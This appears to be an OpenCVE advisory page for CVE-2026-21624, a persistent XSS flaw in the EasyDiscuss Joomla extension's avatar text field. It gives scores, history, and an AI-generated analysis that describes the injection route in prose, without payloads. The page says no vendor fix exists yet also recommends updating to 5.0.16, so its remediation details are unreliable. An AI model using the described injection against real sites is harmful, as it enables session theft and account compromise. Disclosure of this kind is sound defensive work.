Description
Lack of input filterung leads to a persistent XSS vulnerability in the user avatar text handling of the Easy Discuss component for Joomla.
Published: 2026-01-16
Score: 9.4 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Persistent Cross-Site Scripting
Action: Immediate Patch
AI Analysis

Impact

Lack of input filtering in the user avatar text field of the EasyDiscuss component for Joomla allows attackers to inject malicious scripts that are stored and displayed to other users. This persistent XSS can lead to theft of session cookies, defacement of user profiles, and the execution of arbitrary code in the victim’s browser. The weakness corresponds to CWE‑79, which focuses on improper handling of untrusted input.

Affected Systems

The vulnerability affects Stackideas.com’s EasyDiscuss extension for Joomla, versions 1.0.0 through 5.0.15 inclusive. Systems running these versions of the component on any Joomla site are impacted, regardless of the host’s operating system or server configuration.

Risk and Exploitability

The CVSS score of 9.4 categorizes the flaw as critical in terms of impact. The EPSS score is below 1 %, indicating a very low probability of exploit at present, and it is not listed in the CISA Known Exploited Vulnerabilities catalog. Attackers are likely to exploit the vulnerability by creating or editing a user profile to include malicious script tags in the avatar text; the injected payload is then rendered in the context of other users who view the profile, resulting in client-side compromise. Because the payload is stored in the database, the effect persists across sessions and users.

Generated by OpenCVE AI on April 18, 2026 at 05:45 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update EasyDiscuss to version 5.0.16 or later released by Stackideas to fix the input filtering deficiency.
  • Remove any malicious avatar text from existing user profiles or apply server-side sanitization to the avatar field.
  • Enable Joomla’s built-in content filtering (or a reputable input-sanitization extension) to block script tags at the application layer.

Generated by OpenCVE AI on April 18, 2026 at 05:45 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

References
Link Providers
https://stackideas.com/easydiscuss cve-icon cve-icon
History

Fri, 30 Jan 2026 18:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:stackideas:easydiscuss:*:*:*:*:*:joomla\!:*:*
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Mon, 19 Jan 2026 09:45:00 +0000

Type Values Removed Values Added
First Time appeared Joomla
Joomla joomla
Joomla joomla!
Stackideas
Stackideas easydiscuss
Vendors & Products Joomla
Joomla joomla
Joomla joomla!
Stackideas
Stackideas easydiscuss

Fri, 16 Jan 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 16 Jan 2026 15:15:00 +0000

Type Values Removed Values Added
Description Lack of input filterung leads to a persistent XSS vulnerability in the user avatar text handling of the Easy Discuss component for Joomla.
Title Extension - stackideas.com - Persistent XSS in EasyDiscuss component 1.0.0-5.0.15 for Joomla
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 9.4, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H'}

Subscriptions

Joomla Joomla Joomla!
Stackideas Easydiscuss
cve-icon MITRE

Status: PUBLISHED

Assigner: Joomla

Published:

Updated: 2026-01-16T15:41:11.155Z

Reserved: 2026-01-01T04:42:27.959Z

Link: CVE-2026-21624

cve-icon Vulnrichment

Updated: 2026-01-16T15:41:03.493Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-16T15:15:54.873

Modified: 2026-01-30T18:43:24.353

Link: CVE-2026-21624

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T05:45:38Z

Weaknesses